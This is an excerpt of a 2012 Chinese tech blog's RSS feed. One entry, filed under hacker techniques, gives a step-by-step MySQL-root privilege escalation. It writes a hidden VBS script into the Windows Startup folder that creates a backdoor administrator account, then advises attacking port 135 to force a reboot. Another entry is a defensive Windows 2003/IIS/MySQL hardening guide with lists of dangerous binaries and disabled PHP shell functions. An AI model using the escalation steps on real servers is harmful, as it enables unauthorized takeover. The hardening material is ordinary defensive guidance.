/></a></p>]]></description><category>黑客技术</category><comments>http://blog.sukun.net/html/pr.exe,cc.exe,提权.html#comment</comments><wfw:comment>http://blog.sukun.net/</wfw:comment><wfw:commentRss>http://blog.sukun.net/feed.asp?cmt=178</wfw:commentRss><trackback:ping>http://blog.sukun.net/cmd.asp?act=tb&amp;id=178&amp;key=aaaaf143</trackback:ping></item><item><title>戴尔引导盘官方下载地址</title><author>42494149@qq.com (admin)</author><link>http://blog.sukun.net/html/177.html</link><pubDate>Wed, 01 Feb 2012 04:21:47 +0800</pubDate><guid>http://blog.sukun.net/html/177.html</guid><description><![CDATA[<p><a href="http://support1.ap.dell.com/cn/zh/forum/thread.asp?fid=15&amp;tid=261838">http://support1.ap.dell.com/cn/zh/forum/thread.asp?fid=15&amp;tid=261838</a></p>]]></description><category>服务器</category><comments>http://blog.sukun.net/html/177.html#comment</comments><wfw:comment>http://blog.sukun.net/</wfw:comment><wfw:commentRss>http://blog.sukun.net/feed.asp?cmt=177</wfw:commentRss><trackback:ping>http://blog.sukun.net/cmd.asp?act=tb&amp;id=177&amp;key=bc15631f</trackback:ping></item><item><title>戴尔服务器安装详细图组地址</title><author>42494149@qq.com (admin)</author><link>http://blog.sukun.net/html/176.html</link><pubDate>Wed, 01 Feb 2012 00:31:28 +0800</pubDate><guid>http://blog.sukun.net/html/176.html</guid><description><![CDATA[<p><a href="http://www.cnzz.cc/edu/Server/windows/5437_3.html">http://www.cnzz.cc/edu/Server/windows/5437_3.html</a></p>]]></description><category>服务器</category><comments>http://blog.sukun.net/html/176.html#comment</comments><wfw:comment>http://blog.sukun.net/</wfw:comment><wfw:commentRss>http://blog.sukun.net/feed.asp?cmt=176</wfw:commentRss><trackback:ping>http://blog.sukun.net/cmd.asp?act=tb&amp;id=176&amp;key=b08fa467</trackback:ping></item><item><title>root用户提权之mysql写入启动项提权</title><author>42494149@qq.com (admin)</author><link>http://blog.sukun.net/html/175.html</link><pubDate>Tue, 17 Jan 2012 18:53:33 +0800</pubDate><guid>http://blog.sukun.net/html/175.html</guid><description><![CDATA[<p>实际操作中可以在webshell用udf.dll提权,用函数的上传文件功能上传文件到启动目录,再用shut函数重起系统.(目前没成功过,有机会本地测试一下,先记录在这了).如果是英文版的系统,启动目录在 &quot;C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup&quot;<br />1、连接到对方MYSQL 服务器 <br />mysql -u root -h 192.168.0.1 <br />mysql.exe 这个程序在你安装了MYSQL的的BIN目录中<br />2、让我们来看看服务器中有些什么数据库 <br />mysql&gt;show databases; <br />MYSQL默认安装时会有MYSQL、TEST这两个数据库，如果你看到有其它的数据库那么就是用户自建的数据库。<br />3、让我们进入数据库 <br />mysql&gt;use test; <br />我们将会进入test数据库中<br />4、查看我们进入数据库中有些什么数据表 <br />mysql&gt;show tables; <br />默认的情况下，test中没有任何表的存在。 <br />以下为关键的部分<br />5、在TEST数据库下创建一个新的表； <br />mysql&gt;create table a (cmd text); <br />好了，我们创建了一个新的表，表名为a，表中只存放一个字段，字段名为cmd，为text文本。<br />6、在表中插入内容 <br />mysql&gt;insert into a values (&quot;set wshshell=createobject (&quot;&quot;wscript.shell&quot;&quot; ) &quot; ); <br />mysql&gt;insert into a values (&quot;a=wshshell.run (&quot;&quot;cmd.exe /c net user qwer qwer!@#$1234 /add&quot;&quot;,0) &quot; ); <br />mysql&gt;insert into a values (&quot;b=wshshell.run (&quot;&quot;cmd.exe /c net localgroup Administrators qwer /add&quot;&quot;,0) &quot; ); <br />注意双引号和括号以及后面的&ldquo;0&rdquo;一定要输入！我们将用这三条命令来建立一个VBS的脚本程序！<br />7、好了，现在我们来看看表a中有些什么 <br />mysql&gt;select * from a; <br />我们将会看到表中有三行数据，就是我们刚刚输入的内容，确认你输入的内容无误后，我们来到下一步<br />8、输出表为一个VBS的脚本文件 <br />mysql&gt;select * from a into outfile &quot;c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\a.vbs&quot;; 我们把我们表中的内容输入到启动组中，是一个VBS的脚本文件！注意&ldquo;\&quot;符号。<br />9、看到这大家肯定知道了，就是利用MYSQL输出一个可执行的文件而已。为什么不用BAT呢，因为启动运行时会有明显的DOS窗口出来，而用VBS脚本则可以完全隐藏窗口且不会有错误提示！本来，应该还有一句完成脚本后自动删除此脚本的，但是中文目录实在无法处理，只有作罢！好了，找个工具攻击135让服务器重启吧，几分钟以后你就是管理员了。<br />以测试 可以成功<br />&nbsp;</p>]]></description><category>黑客技术</category><comments>http://blog.sukun.net/html/175.html#comment</comments><wfw:comment>http://blog.sukun.net/</wfw:comment><wfw:commentRss>http://blog.sukun.net/feed.asp?cmt=175</wfw:commentRss><trackback:ping>http://blog.sukun.net/cmd.asp?act=tb&amp;id=175&amp;key=10739fb1</trackback:ping></item><item><title>服务器安全设置</title><author>42494149@qq.com (admin)</author><link>http://blog.sukun.net/html/174.html</link><pubDate>Tue, 17 Jan 2012 18:51:08 +0800</pubDate><guid>http://blog.sukun.net/html/174.html</guid><description><![CDATA[<p>第一步： <br />一、先关闭不需要的端口 <br />我比较小心，先关了端口。只开了3389 21 80 1433（MYSQL）有些人一直说什么默认的3389不安全，对此我不否认，但是利用的途径也只能一个一个的穷举爆破，你把帐号改</p><p>了密码设置为十五六位，我估计他要破上好几年，哈哈!办法:本地连接--属性--Internet协议(TCP/IP)--高级--选项--TCP/IP筛选--属性--把勾打上 然后添加你需要的端口即可。PS一句:设置完端口需要重新启动! <br />当然大家也可以更改远程连接端口方法: <br />Windows Registry Editor Version 5.00 <br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] <br />&quot;PortNumber&quot;=dword:00002683 <br />保存为.REG文件双击即可!更改为9859，当然大家也可以换别的端口， 直接打开以上注册表的地址，把值改为十进制的输入你想要的端口即可!重启生效! <br />还有一点，在2003系统里，用TCP/IP筛选里的端口过滤功能，使用FTP服务器的时候，只开放21端口，在进行FTP传输的时候，FTP 特有的Port模式和Passive模式，在进行数据传输的时候，需要动态的打开高端口，所以在使用TCP/IP过滤的情况下，经常会出现连接上后无法列出目录和数据传输的问题。所以在2003系统上增加的windows连接防火墙能很好的解决这个问题，所以都不推荐使用网卡的TCP/IP过滤功能。所做FTP下载的用户看仔细点，表怪俺说俺写文章是垃圾...如果要关闭不必要的端口，在<a href="file://\\system32\\drivers\\etc\\services">\\system32\\drivers\\etc\\services</a>中有列表，记事本就可以打开的。如果懒惰的话，最简单的方法是启用WIN2003的自身带的网络防火墙，并进行端口的改变。功能还可以!Internet 连接防火墙可以有效地拦截对Windows 2003服务器的非法入侵，防止非法远程主机对服务器的扫描，提高Windows 2003服务器的安全性。同时，也可以有效拦截利用操作系统漏洞进行端口攻击的病毒，如冲击波等蠕虫病毒。如果在用Windows 2003构造的虚拟路由器上启用此防火墙功能，能够对整个内部网络起到很好的保护作用。 <br />二、关闭不需要的服务 打开相应的审核策略 <br />我关闭了以下的服务 <br />Computer Browser 维护网络上计算机的最新列表以及提供这个列表 <br />Task scheduler 允许程序在指定时间运行 <br />Routing and Remote Access 在局域网以及广域网环境中为企业提供路由服务 <br />Removable storage 管理可移动媒体、驱动程序和库 <br />Remote Registry Service 允许远程注册表操作 <br />Print Spooler 将文件加载到内存中以便以后打印。要用打印机的朋友不能禁用这项 <br />IPSEC Policy Agent 管理IP安全策略以及启动ISAKMP/OakleyIKE）和IP安全驱动程序 <br />Distributed Link Tracking Client 当文件在网络域的NTFS卷中移动时发送通知 <br />Com+ Event System 提供事件的自动发布到订阅COM组件 <br />Alerter 通知选定的用户和计算机管理警报 <br />Error Reporting Service 收集、存储和向 Microsoft 报告异常应用程序 <br />Messenger 传输客户端和服务器之间的 NET SEND 和 警报器服务消息 <br />Telnet 允许远程用户登录到此计算机并运行程序 <br />把不必要的服务都禁止掉，尽管这些不一定能被攻击者利用得上，但是按照安全规则和标准上来说，多余的东西就没必要开启，减少一份隐患。 <br />在&quot;网络连接&quot;里，把不需要的协议和服务都删掉，这里只安装了基本的Internet协议(TCP/IP)，由于要控制带宽流量服务，额外安装了Qos数据包计划程序。在高级tcp/ip设置里--&quot;NetBIOS&quot;设置&quot;禁用tcp/IP上的NetBIOS(S)&quot;。在高级选项里，使用&quot;Internet连接防火墙&quot;，这是windows 2003 自带的防火墙，在2000系统里没有的功能，虽然没什么功能，但可以屏蔽端口，这样已经基本达到了一个IPSec的功能。 <br />在运行中输入gpedit.msc回车，打开组策略编辑器，选择计算机配置-Windows设置-安全设置-审核策略在创建审核项目时需要注意的是如果审核的项目太多，生成的事件也就越多，那么要想发现严重的事件也越难当然如果审核的太少也会影响你发现严重的事件，你需要根据情况在这二者之间做出选择。 <br />推荐的要审核的项目是: <br />登录事件 成功 失败 <br />账户登录事件 成功 失败 <br />系统事件 成功 失败 <br />策略更改 成功 失败 <br />对象访问 失败 <br />目录服务访问 失败 <br />特权使用 失败 <br />三、磁盘权限设置 <br />1.系统盘权限设置 <br />C:分区部分： <br />c:\ <br />administrators 全部（该文件夹，子文件夹及文件） <br />CREATOR OWNER 全部（只有子文件来及文件） <br />system 全部（该文件夹，子文件夹及文件） <br />IIS_WPG 创建文件/写入数据（只有该文件夹） <br />IIS_WPG（该文件夹，子文件夹及文件） <br />遍历文件夹/运行文件 <br />列出文件夹/读取数据 <br />读取属性 <br />创建文件夹/附加数据 <br />读取权限 <br />c:\Documents and Settings <br />administrators 全部（该文件夹，子文件夹及文件） <br />Power Users （该文件夹，子文件夹及文件） <br />读取和运行 <br />列出文件夹目录 <br />读取 <br />SYSTEM全部（该文件夹，子文件夹及文件） <br />C:\Program Files <br />administrators 全部（该文件夹，子文件夹及文件） <br />CREATOR OWNER全部（只有子文件来及文件） <br />IIS_WPG （该文件夹，子文件夹及文件） <br />读取和运行 <br />列出文件夹目录 <br />读取 <br />Power Users（该文件夹，子文件夹及文件） <br />修改权限 <br />SYSTEM全部（该文件夹，子文件夹及文件） <br />TERMINAL SERVER USER （该文件夹，子文件夹及文件） <br />修改权限 <br />2.网站及虚拟机权限设置（比如网站在E盘） <br />说明：我们假设网站全部在E盘wwwsite目录下，并且为每一个虚拟机创建了一个guest用户，用户名为vhost1...vhostn并且创建了一个webuser组，把所有的vhost用户全部加入这个webuser组里面方便管理。 <br />E:\ <br />Administrators全部（该文件夹，子文件夹及文件） <br />E:\wwwsite <br />Administrators全部（该文件夹，子文件夹及文件） <br />system全部（该文件夹，子文件夹及文件） <br />service全部（该文件夹，子文件夹及文件） <br />E:\wwwsite\vhost1 <br />Administrators全部（该文件夹，子文件夹及文件） <br />system全部（该文件夹，子文件夹及文件） <br />vhost1全部（该文件夹，子文件夹及文件） <br />3.数据备份盘 <br />数据备份盘最好只指定一个特定的用户对它有完全操作的权限。比如F盘为数据备份盘，我们只指定一个管理员对它有完全操作的权限。 <br />4.其它地方的权限设置 <br />请找到c盘的这些文件，把安全性设置只有特定的管理员有完全操作权限。 <br />下列这些文件只允许administrators访问 <br />net.exe <br />net1.exet <br />cmd.exe <br />tftp.exe <br />netstat.exe <br />regedit.exe <br />at.exe <br />attrib.exe <br />cacls.exe <br />format.com <br />5.删除c:\inetpub目录，删除iis不必要的映射，建立陷阱帐号，更改描述。 <br />四、防火墙、杀毒软件的安装 <br />我见过的Win2000/Nt服务器从来没有见到有安装了防毒软件的，其实这一点非常重要。一些好的杀毒软件不仅能杀掉一些著名的病毒，还能查杀大量木马和后门程序。这样的话，&ldquo;黑客&rdquo;们使用的那些有名的木马就毫无用武之地了。不要忘了经常升级病毒库，我们推荐mcafree杀毒软件+blackice防火墙 <br />五、SQL2000 SERV-U FTP安全设置 <br />SQL安全方面 <br />1.System Administrators 角色最好不要超过两个 <br />2.如果是在本机最好将身份验证配置为Win登陆 <br />3.不要使用Sa账户，为其配置一个超级复杂的密码 <br />4.删除以下的扩展存储过程格式为: <br />use master <br />sp_dropextendedproc '扩展存储过程名' <br />xp_cmdshell:是进入操作系统的最佳捷径，删除 <br />访问注册表的存储过程，删除 <br />Xp_regaddmultistring Xp_regdeletekey Xp_regdeletevalue Xp_regenumvalues <br />Xp_regread Xp_regwrite Xp_regremovemultistring <br />OLE自动存储过程，不需要删除 <br />Sp_OACreate Sp_OADestroy Sp_OAGetErrorInfo Sp_OAGetProperty <br />Sp_OAMethod Sp_OASetProperty Sp_OAStop <br />5.隐藏 SQL Server、更改默认的1433端口 <br />右击实例选属性-常规-网络配置中选择TCP/IP协议的属性，选择隐藏 SQL Server 实例，并改原默认的1433端口 <br />serv-u的几点常规安全需要设置下: <br />选中&quot;Block &quot;FTP_bounce&quot;attack and FXP&quot;。什么是FXP呢?通常，当使用FTP协议进行文件传输时，客户端首先向FTP服务器发出一个&quot;PORT&quot;命令，该命令中包含此用户的IP地址和将被用来进行数据传输的端口号，服务器收到后，利用命令所提供的用户地址信息建立与用户的连接。大多数情况下，上述过程不会出现任何问题，但当客户端是一名恶意用户时，可能会通过在PORT命令中加入特定的地址信息，使FTP服务器与其它非客户端的机器建立连接。虽然这名恶意用户可能本身无权直接访问某一特定机器，但是如果FTP服务器有权访问该机器的话，那么恶意用户就可以通过FTP服务器作为中介，仍然能够最终实现与目标服务器的连接。这就是FXP，也称跨服务器攻击。选中后就可以防止发生此种情况。 <br />六、IIS安全设置 <br />IIS的相关设置： <br />删除默认建立的站点的虚拟目录，停止默认web站点，删除对应的文件目录c：inetpub，配置所有站点的公共设置，设置好相关的连接数限制，带宽设置以及性能设置等其他设置。配置应用程序映射，删除所有不必要的应用程序扩展，只保留asp，php，cgi，pl，aspx应用程序扩展。对于php和cgi，推荐使用isapi方式解析，用exe解析对安全和性能有所影响。用户程序调试设置发送文本错误信息给户。对于数据库，尽量采用mdb后缀，不需要更改为asp，可在IIS中设置一个mdb的扩展映射，将这个映射使用一个无关的dll文件如C：WINNTsystem32inetsrvssinc.dll来防止数据库被下载。设置IIS的日志保存目录，调整日志记录信息。设置为发送文本错误信息。修改403错误页面，将其转向到其他页，可防止一些扫描器的探测。另外为隐藏系统信息，防止telnet到80端口所泄露的系统版本信息可修改IIS的banner信息，可以使用winhex手工修改或者使用相关软件如banneredit修改。 <br />对于用户站点所在的目录，在此说明一下，用户的FTP根目录下对应三个文件佳，wwwroot，database，logfiles，分别存放站点文件，数据库备份和该站点的日志。如果一旦发生入侵事件可对该用户站点所在目录设置具体的权限，图片所在的目录只给予列目录的权限，程序所在目录如果不需要生成文件（如生成html的程序）不给予写入权限。因为是虚拟主机平常对脚本安全没办法做到细致入微的地步，更多的只能在方法用户从脚本提升权限： <br />ASP的安全设置： <br /><a href="http://www.knowsky.com/system.asp">http://www.knowsky.com/system.asp</a> <br />设置过权限和服务之后，防范asp木马还需要做以下工作，在cmd窗口运行以下命令： <br />regsvr32/u C：\WINNT\System32\wshom.ocx <br />del C：\WINNT\System32\wshom.ocx <br />regsvr32/u C：\WINNT\system32\shell32.dll <br />del C：\WINNT\system32\shell32.dll <br />即可将WScript.Shell， Shell.application， WScript.Network组件卸载，可有效防止asp木马通过wscript或shell.application执行命令以及使用木马查看一些系统敏感信息。另法：可取消以上文件的users用户的权限，重新启动IIS即可生效。但不推荐该方法。 <br />另外，对于FSO由于用户程序需要使用，服务器上可以不注销掉该组件，这里只提一下FSO的防范，但并不需要在自动开通空间的虚拟商服务器上使用，只适合于手工开通的站点。可以针对需要FSO和不需要FSO的站点设置两个组，对于需要FSO的用户组给予c：winntsystem32scrrun.dll文件的执行权限，不需要的不给权限。重新启动服务器即可生效。 <br />对于这样的设置结合上面的权限设置，你会发现海阳木马已经在这里失去了作用！ <br />PHP的安全设置： <br />默认安装的php需要有以下几个注意的问题： <br />C：\winnt\php.ini只给予users读权限即可。在php.ini里需要做如下设置： <br />Safe_mode=on <br />register_globals = Off <br />allow_url_fopen = Off <br />display_errors = Off <br />magic_quotes_gpc = On [默认是on，但需检查一遍] <br />open_basedir =web目录 <br />disable_functions =passthru，exec，shell_exec，system，phpinfo，get_cfg_var，popen，chmod <br />默认设置com.allow_dcom = true修改为false[修改前要取消掉前面的；] <br />MySQL安全设置： <br />如果服务器上启用MySQL数据库，MySQL数据库需要注意的安全设置为： <br />删除mysql中的所有默认用户，只保留本地root帐户，为root用户加上一个复杂的密码。赋予普通用户updatedeletealertcreatedrop权限的时候，并限定到特定的数据库，尤其要避免普通客户拥有对mysql数据库操作的权限。检查mysql.user表，取消不必要用户的shutdown_priv，relo <br />ad_priv，process_priv和File_priv权限，这些权限可能泄漏更多的服务器信息包括非mysql的其它信息出去。可以为mysql设置一个启动用户，该用户只对mysql目录有权限。设置安装目录的data数据库的权限（此目录存放了mysql数据库的数据信息）。对于mysql安装目录给users加上读取、列目录和执行权限。 <br />Serv-u安全问题： <br />安装程序尽量采用最新版本，避免采用默认安装目录，设置好serv-u目录所在的权限，设置一个复杂的管理员密码。修改serv-u的banner信息，设置被动模式端口范围（4001&mdash;4003）在本地服务器中设置中做好相关安全设置：包括检查匿名密码，禁用反超时调度，拦截&ldquo;FTP bounce&rdquo;攻击和FXP，对于在30秒内连接超过3次的用户拦截10分钟。域中的设置为：要求复杂密码，目录只使用小写字母，高级中设置取消允许使用MDTM命令更改文件的日期。 <br />更改serv-u的启动用户：在系统中新建一个用户，设置一个复杂点的密码，不属于任何组。将servu的安装目录给予该用户完全控制权限。建立一个FTP根目录，需要给予这个用户该目录完全控制权限，因为所有的ftp用户上传，删除，更改文件都是继承了该用户的权限，否则无法操作文件。另外需要给该目录以上的上级目录给该用户的读取权限，否则会在连接的时候出现530 Not logged in， home directory does not exist.比如在测试的时候ftp根目录为d：soft，必须给d盘该用户的读取权限，为了安全取消d盘其他文件夹的继承权限。而一般的使用默认的system启动就没有这些问题，因为system一般都拥有这些权限的。 <br />七、其它 <br />1.隐藏重要文件/目录可以修改注册表实现完全隐藏：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ Current-Version\Explorer\Advanced\Folder\Hi-dden\SHOWALL&rdquo;，鼠标右击 &ldquo;CheckedValue&rdquo;，选择修改，把数值由1改为0 <br />2.启动系统自带的Internet连接防火墙，在设置服务选项中勾选Web服务器； <br />3.防止SYN洪水攻击： <br />HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters <br />新建DWORD值，名为SynAttackProtect，值为2 <br />EnablePMTUDiscovery REG_DWORD 0 <br />NoNameReleaseOnDemand REG_DWORD 1 <br />EnableDeadGWDetect REG_DWORD 0 <br />KeepAliveTime REG_DWORD 300，000 <br />PerformRouterDiscovery REG_DWORD 0 <br />EnableICMPRedirects REG_DWORD 0 <br />4. 禁止响应ICMP路由通告报文： <br />HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\interface <br />新建DWORD值，名为PerformRouterDiscovery 值为0 <br />5. 防止ICMP重定向报文的攻击： <br />HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters <br />将EnableICMPRedirects 值设为0 <br />6. 不支持IGMP协议： <br />HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters <br />新建DWORD值，名为IGMPLevel 值为0 <br />7.修改终端服务端口： <br />运行regedit，找到[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp]，看到右边的PortNumber了吗？在十进制状态下改成你想要的端口号吧，比如7126之类的，只要不与其它冲突即可。 <br />第二处HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp，方法同上，记得改的端口号和上面改的一样就行了。 <br />8.禁止IPC空连接： <br />cracker可以利用net use命令建立空连接，进而入侵，还有net view，nbtstat这些都是基于空连接的，禁止空连接就好了。打开注册表，找到Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 把这个值改成&rdquo;1&rdquo;即可。 <br />9.更改TTL值： <br />cracker可以根据ping回的TTL值来大致判断你的操作系统，如： <br />TTL=107（WINNT）; <br />TTL=108（win2000）; <br />TTL=127或128（win9x）; <br />TTL=240或241（linux）; <br />TTL=252（solaris）; <br />TTL=240（Irix）; <br />实际上你可以自己更改的： <br />HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters：DefaultTTL REG_DWORD 0-0xff（0-255 十进制，默认值128）改成一个莫名其妙的数字如258，起码让那些小菜鸟晕上半天，就此放弃入侵你也不一定哦。 <br />10. 删除默认共享： <br />有人问过我一开机就共享所有盘，改回来以后，重启又变成了共享是怎么回事，这是2K为管理而设置的默认共享，必须通过修改注册表的方式取消它：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters：AutoShareServer类型是REG_DWORD把值改为0即可 <br />11. 禁止建立空连接： <br />默认情况下，任何用户通过通过空连接连上服务器，进而枚举出帐号，猜测密码。我们可以通过修改注册表来禁止建立空连接： <br />Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous 的值改成&rdquo;1&rdquo;即可。 <br />12.禁用TCP/IP上的NetBIOS <br />网上邻居-属性-本地连接-属性-Internet协议（TCP/IP）属性-高级-WINS面板-NetBIOS设置-禁用TCP/IP上的NetBIOS。这样cracker就无法用nbtstat命令来读取你的NetBIOS信息和网卡MAC地址了。 <br />13. 账户安全 <br />首先禁止一切账户，除了你自己，呵呵。然后把Administrator改名。我呢就顺手又建了个Administrator账户，不过是什么权限都没有的那种，然后打开记事本，一阵乱敲，复制，粘贴到&ldquo;密码&rdquo;里去，呵呵，来破密码吧~！破完了才发现是个低级账户，看你崩溃不？ <br />创建2个管理员用帐号 <br />虽然这点看上去和上面这点有些矛盾，但事实上是服从上面的规则的。 创建一个一般权限帐号用来收信以及处理一些日常事物，另一个拥有Administrators 权限的帐户只在需要的时候使用。可以让管理员使用 &ldquo; RunAS&rdquo; 命令来执行一些需要特权才能作的一些工作，以方便管理 <br />14.更改C:\WINDOWS\Help\iisHelp\common\404b.htm内容改为这样，出错了自动转到首页。 <br />15.本地安全策略和组策略的设置，如果你在设置本地安全策略时设置错了，可以这样恢复成它的默认值 <br />打开 %SystemRoot%\Security文件夹，创建一个 &quot;OldSecurity&quot;子目录，将%SystemRoot%\Security下所有的.log文件移到这个新建的子文件夹中 <br />在%SystemRoot%\Security\database\下找到&quot;Secedit.sdb&quot;安全数据库并将其改名，如改为&quot;Secedit.old&quot; <br />启动&quot;安全配置和分析&quot;MMC管理单元:&quot;开始&quot;-&gt;&quot;运行&quot;-&gt;&quot;MMC&quot;，启动管理控制台，&quot;添加/删除管理单元&quot;，将&quot;安全配置和分析&quot;管理单元添加上 <br />右击&quot;安全配置和分析&quot;-&gt;&quot;打开数据库&quot;，浏览&quot;C:\WINNT\security\Database&quot;文件夹，输入文件名&quot;secedit.sdb&quot;，单击&quot;打开&quot; <br />当系统提示输入一个模板时，选择&quot;Setup Security.inf&quot;，单击&quot;打开&quot;，如果系统提示&quot;拒绝访问数据库&quot;，不管他，你会发现在&quot;C:\WINNT\security\Database&quot;子文件夹中重新生成了新的安全数据库，在&quot;C:\WINNT\security&quot;子文件夹下重新生成了log文件，安全数据库重建成功。 <br />16.禁用DCOM: <br />运行中输入 Dcomcnfg.exe。 回车， 单击&ldquo;控制台根节点&rdquo;下的&ldquo;组件服务&rdquo;。 打开&ldquo;计算机&rdquo;子文件夹。对于本地计算机，请以右键单击&ldquo;我的电脑&rdquo;，然后选择&ldquo;属性&rdquo;。选择&ldquo;默认属性&rdquo;选项卡。清除&ldquo;在这台计算机上启用分布式 COM&rdquo;复选框。</p><p>&nbsp;</p><p>第二步： <br />尽管Windows 2003的功能在不断增强，但是由于先天性的原因，它还存在不少安全隐患，要是不将这些隐患&ldquo;堵住&rdquo;，可能会给整个系统带来不必要的麻烦；下面笔者就介绍Windows2003中不常见的安全隐患的防堵方法，希望能对各位带来帮助！ <br />堵住自动保存隐患</p><p>Windows 2003操作系统在调用应用程序出错时，系统中的Dr. Watson会自动将一些重要的调试信息保存起来，以便日后维护系统时查看，不过这些信息很有可能被黑客&ldquo;瞄上&rdquo;，一旦瞄上的话，各种重要的调试信息就会暴露无疑，为了堵住Dr. Watson自动保存调试信息的隐患，我们可以按如下步骤来实现：</p><p>1、打开开始菜单，选中&ldquo;运行&rdquo;命令，在随后打开的运行对话框中，输入注册表编辑命令&ldquo;ergedit&rdquo;命令，打开一个注册表编辑窗口；</p><p>2、在该窗口中，用鼠标依次展开HKEY_local_machine＼software＼Microsoft＼WindowsdowsNT＼CurrentVersion＼AeDebug分支，在对应AeDebug键值的右边子窗口中，用鼠标双击Auto值，在弹出的参数设置窗口中，将其数值重新设置为&ldquo;0&rdquo;，</p><p>3、打开系统的Windows资源管理器窗口，并在其中依次展开Documents and Settings文件夹、All Users文件夹、Shared Documents文件夹、DrWatson文件夹，最后将对应DrWatson中的User.dmp文件、Drwtsn32.log文件删除掉。</p><p>完成上面的设置后，重新启动一下系统，就可以堵住自动保存隐患了。</p><p>堵住资源共享隐患</p><p>为了给局域网用户相互之间传输信息带来方便，Windows Server 2003系统很是&ldquo;善解人意&rdquo;地为各位提供了文件和打印共享功能，不过我们在享受该功能带来便利的同时，共享功能也会&ldquo;引狼入室&rdquo;，&ldquo;大度&rdquo;地向黑客们敞开了不少漏洞，给服务器系统造成了很大的不安全性；所以，在用完文件或打印共享功能时，大家千万要随时将功能关闭哟，以便堵住资源共享隐患，下面就是关闭共享功能的具体步骤：</p><p>1、执行控制面板菜单项下面的&ldquo;网络连接&rdquo;命令，在随后出现的窗口中，用鼠标右键单击一下&ldquo;本地连接&rdquo;图标；</p><p>2、在打开的快捷菜单中，单击&ldquo;属性&rdquo;命令，这样就能打开一个&ldquo;Internet协议(TCP/IP)&rdquo;属性设置对话框；</p><p>3、在该界面中取消&ldquo;Microsoft网络的文件和打印机共享&rdquo;这个选项；</p><p>4、如此一来，本地计算机就没有办法对外提供文件与打印共享服务了，这样黑客自然也就少了攻击系统的&ldquo;通道&rdquo;。</p><p>堵住远程访问隐患</p><p>在Windows2003系统下，要进行远程网络访问连接时，该系统下的远程桌面功能可以将进行网络连接时输入的用户名以及密码，通过普通明文内容方式传输给对应连接端的客户端程序；在明文帐号传输过程中，实现&ldquo;安插&rdquo;在网络通道上的各种嗅探工具，会自动进入&ldquo;嗅探&rdquo;状态，这个明文帐号就很容易被&ldquo;俘虏&rdquo;了；明文帐号内容一旦被黑客或其他攻击者另谋他用的话，呵呵，小心自己的系统被&ldquo;疯狂&rdquo;攻击吧！为了杜绝这种安全隐患，我们可以按下面的方法来为系统&ldquo;加固&rdquo;：</p><p>1、点击系统桌面上的&ldquo;开始&rdquo;按钮，打开开始菜单；</p><p>2、从中执行控制面板命令，从弹出的下拉菜单中，选中&ldquo;系统&rdquo;命令，打开一个系统属性设置界面；</p><p>3、在该界面中，用鼠标单击&ldquo;远程&rdquo;标签；</p><p>4、在随后出现的标签页面中，将&ldquo;允许用户远程连接到这台计算机&rdquo;选项取消掉，这样就可以将远程访问连接功能屏蔽掉，从而堵住远程访问隐患了。</p><p>堵住用户切换隐患</p><p>Windows 2003系统为我们提供了快速用户切换功能，利用该功能我们可以很轻松地登录到系统中；不过在享受这种轻松时，系统也存在安装隐患，例如我们要是执行系统&ldquo;开始&rdquo;菜单中的&ldquo;注销&rdquo;命令来，快速&ldquo;切换用户&rdquo;时，再用传统的方式来登录系统的话，系统很有可能会本次登录，错误地当作是对计算机系统的一次暴力&ldquo;袭击&rdquo;，这样Windows2003系统就可能将当前登录的帐号当作非法帐号，将它锁定起来，这显然不是我们所需要的；不过，我们可以按如下步骤来堵住用户切换时，产生的安全隐患：</p><p>在Windows 2003系统桌面中，打开开始菜单下面的控制面板命令，找到下面的&ldquo;管理工具&rdquo;命令，再执行下级菜单中的&ldquo;计算机管理&rdquo;命令，找到&ldquo;用户帐户&rdquo;图标，并在随后出现的窗口中单击&ldquo;更改用户登录或注销的方式&rdquo;；在打开的设置窗口中，将&ldquo;使用快速用户切换&rdquo;选项取消掉就可以了。<br />&nbsp;</p>]]></description><category>服务器</category><comments>http://blog.sukun.net/html/174.html#comment</comments><wfw:comment>http://blog.sukun.net/</wfw:comment><wfw:commentRss>http://blog.sukun.net/feed.asp?cmt=174</wfw:commentRss><trackback:ping>http://blog.sukun.net/cmd.asp?act=tb&amp;id=174&amp;key=0deacb56</trackback:ping></item><item><title>在线QQ客服代码生成地址</title><author>42494149@qq.com (admin)</author><link>http://blog.sukun.net/html/173.html</link><pubDate>Mon, 09 Jan 2012 14:28:39 +0800</pubDate><guid>http://blog.sukun.net/html/173.html</guid><description><![CDATA[<p><a href="http://www.tool.la/QQCode/">http://www.tool.la/QQCode/</a></p>]]></description><category>服务器</category><comments>http://blog.sukun.net/html/173.html#comment</comments><wfw:comment>http://blog.sukun.net/</wfw:comment><wfw:commentRss>http://blog.sukun.net/feed.asp?cmt=173</wfw:commentRss><trackback:ping>http://blog.sukun.net/cmd.asp?act=tb&amp;id=173&amp;key=38e3a721</trackback:ping></item></channel></rss>

